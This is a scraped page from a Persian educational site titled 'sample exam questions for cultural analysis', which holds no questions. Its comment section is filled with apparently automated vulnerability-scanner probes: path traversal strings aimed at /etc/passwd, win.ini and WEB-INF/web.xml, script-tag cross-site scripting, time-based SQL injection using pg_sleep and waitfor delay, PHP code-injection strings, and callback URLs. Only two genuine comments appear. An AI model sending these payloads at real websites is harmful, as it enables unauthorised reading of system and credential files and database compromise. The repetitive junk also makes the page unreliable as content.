نمونه سوالات امتحانی تحلیل فرهنگی


نمونه سوالات امتحانی تحلیل فرهنگی

تعداد بازدید:

5 بازدید

نمونه سوالات امتحانی تحلیل فرهنگی

نظرات:

270 دیدگاه

نمونه سوالات امتحانی تحلیل فرهنگی

انتشار:

26 آذر 1397

ارسال شده توسط مدیر سایت

لینک کوتاه این مطلب:

https://darsbox.org/b/5464

نمونه سوالات امتحانی تحلیل فرهنگی

نمونه سوالات امتحانی تحلیل فرهنگی

با دوستانتان به اشتراک بگذارید
ارسال دیدگاه

لطفا همه فیلدها را پر کنید

CAPTCHA


نظرات ثبت شده

محمدعلي مسعودي 22 مهر 1398

ممنون


مهدی 24 دی 1397

سلام چرا نمونه سوال تحلیل فرهنگی رو نزاشتید


1 13 دی 1397

WEB-INF\web.xml


1 13 دی 1397

WEB-INF/web.xml


1 13 دی 1397

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\


1 13 دی 1397

1


1 13 دی 1397

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini


1 13 دی 1397

1


1 13 دی 1397

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini


1 13 دی 1397

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini


1 13 دی 1397

..\..\..\..\..\..\..\..\windows\win.ini


1 13 دی 1397

................windowswin.ini


1 13 دی 1397

../../../../../../../../../../windows/win.ini.jpg


1 13 دی 1397

../../../../../../../../../../boot.ini


1 13 دی 1397

../../../../../../../../../../windows/win.ini


1 13 دی 1397

WEB-INF\web.xml


1 13 دی 1397

/WEB-INF/web.xml


1 13 دی 1397

1_9767


1 13 دی 1397

WEB-INF/web.xml


1 13 دی 1397

/\../\../\../\../\../\../\../etc/passwd


1 13 دی 1397

file:///etc/passwd


1 13 دی 1397

'"()&%<acx><ScRiPt >C8F1(9583)</ScRiPt>


1 13 دی 1397

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.


1 13 دی 1397

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd


1 13 دی 1397

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd


1 13 دی 1397

/.././.././.././.././.././.././.././../etc/./passwd%00


1 13 دی 1397

1'"()&%<acx><ScRiPt >C8F1(9346)</ScRiPt>


1 13 دی 1397

1


1 13 دی 1397

%2fetc%2fpasswd


1 13 دی 1397

/etc/passwd


1 13 دی 1397

1


1 13 دی 1397

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd


1 13 دی 1397

1


1 13 دی 1397

/../..//../..//../..//../..//../..//etc/passwd.jpg


1 13 دی 1397

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg


1 13 دی 1397

../../../../../../../../../../etc/passwd.jpg


1 13 دی 1397

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg


1 13 دی 1397

../../../../../../../../../../../../../../../proc/version


1 13 دی 1397

../../../../../../../../../../etc/passwd


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

(select convert(int,CHAR(65)))


1 13 دی 1397

1


1 13 دی 1397

1


1_9465 13 دی 1397

1


1 13 دی 1397

JyI=


1 13 دی 1397

@@wTRhC


'"()&%<acx><ScRiPt >C8F1(9379)</ScRiPt> 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

\


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1'"


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

<!--


1 13 دی 1397

1


1'"()&%<acx><ScRiPt >C8F1(9302)</ScRiPt> 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

'"


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

/www.vulnweb.com


1 13 دی 1397

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))


'" 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


<!-- 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


(select convert(int,CHAR(65))) 13 دی 1397

1


))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) 13 دی 1397

1


/www.vulnweb.com 13 دی 1397

1


JyI= 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

comment/.


@@pkZCl 13 دی 1397

1


1 13 دی 1397

${@print(md5(acunetix_wvs_security_test))}\


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

comment


1 13 دی 1397

${@print(md5(acunetix_wvs_security_test))}


1 13 دی 1397

1


1 13 دی 1397

comment


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

http://hitQ8Ikb6Sn9x.bxss.me/


1 13 دی 1397

";print(md5(acunetix_wvs_security_test));$a="


\ 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

0vJ9Uzf9'));select pg_sleep(9); --


1 13 دی 1397

';print(md5(acunetix_wvs_security_test));$a='


1'" 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

;print(md5(acunetix_wvs_security_test));


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

pqUyhT3Z');select pg_sleep(9); --


comment/. 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


comment 13 دی 1397

1


1 13 دی 1397

1


http://hitVfNzqxkLBA.bxss.me/ 13 دی 1397

1


1 13 دی 1397

HoXizVX2';select pg_sleep(9); --


1 13 دی 1397

1


1 13 دی 1397

-1));select pg_sleep(6); --


1 13 دی 1397

1


1 13 دی 1397

1


comment 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

-1);select pg_sleep(6); --


1 13 دی 1397

-1;select pg_sleep(6); --


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

nJq13had'; waitfor delay '0:0:6' --


1 13 دی 1397

1


1 13 دی 1397

http://testasp.vulnweb.com/t/xss.html?%00.jpg


1 13 دی 1397

1 waitfor delay '0:0:6' --


${@print(md5(acunetix_wvs_security_test))}\ 13 دی 1397

1


WEB-INF\web.xml 13 دی 1397

1


${@print(md5(acunetix_wvs_security_test))} 13 دی 1397

1


WEB-INF/web.xml 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

-1); waitfor delay '0:0:3' --


";print(md5(acunetix_wvs_security_test));$a=" 13 دی 1397

1


unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\ 13 دی 1397

1


1 13 دی 1397

-1; waitfor delay '0:0:3' --


1 13 دی 1397

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/


';print(md5(acunetix_wvs_security_test));$a=' 13 دی 1397

1


1 13 دی 1397

'"()


../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini 13 دی 1397

1


http://testasp.vulnweb.com/t/xss.html?%00.jpg 13 دی 1397

1


;print(md5(acunetix_wvs_security_test)); 13 دی 1397

1


../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini 13 دی 1397

1


1 13 دی 1397

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/


1 13 دی 1397

1


/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini 13 دی 1397

1


1 13 دی 1397

-1" OR 2+777-777-1=0+0+0+1 --


..\..\..\..\..\..\..\..\windows\win.ini 13 دی 1397

1


1 13 دی 1397

-1' OR 2+463-463-1=0+0+0+1 or 'vpx4PN5t'='


1 13 دی 1397

-1' OR 2+887-887-1=0+0+0+1 --


'"() 13 دی 1397

1


1 13 دی 1397

testasp.vulnweb.com


1 13 دی 1397

-1 OR 2+75-75-1=0+0+0+1


1 13 دی 1397

http://testasp.vulnweb.com/t/fit.txt?.jpg


1 13 دی 1397

-1 OR 2+374-374-1=0+0+0+1 --


1 13 دی 1397

Http://testasp.vulnweb.com/t/fit.txt


................windowswin.ini 13 دی 1397

1


1 13 دی 1397

^(#$!@#$)(()))******


1 13 دی 1397

Qz0CZSqk


1 13 دی 1397

1&n979179=v921745


1 13 دی 1397

!(()&&!|*|*|


1 13 دی 1397

1some_inexistent_file_with_long_name.jpg


1 13 دی 1397

1


../../../../../../../../../../windows/win.ini.jpg 13 دی 1397

1


1 13 دی 1397

)


1 13 دی 1397

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg


1 13 دی 1397

1


../../../../../../../../../../boot.ini 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


../../../../../../../../../../windows/win.ini 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


^(#$!@#$)(()))****** 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


WEB-INF\web.xml 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


!(()&&!|*|*| 13 دی 1397

1


1 13 دی 1397

1


/WEB-INF/web.xml 13 دی 1397

1


) 13 دی 1397

1


1&n928984=v921342 13 دی 1397

1


testasp.vulnweb.com 13 دی 1397

1


http://testasp.vulnweb.com/t/fit.txt?.jpg 13 دی 1397

1


WEB-INF/web.xml 13 دی 1397

1


Http://testasp.vulnweb.com/t/fit.txt 13 دی 1397

1


1some_inexistent_file_with_long_name.jpg 13 دی 1397

1


http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg 13 دی 1397

1


/\../\../\../\../\../\../\../etc/passwd 13 دی 1397

1


1 13 دی 1397

1


file:///etc/passwd 13 دی 1397

1


1 13 دی 1397

${10000284+9999904}


invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././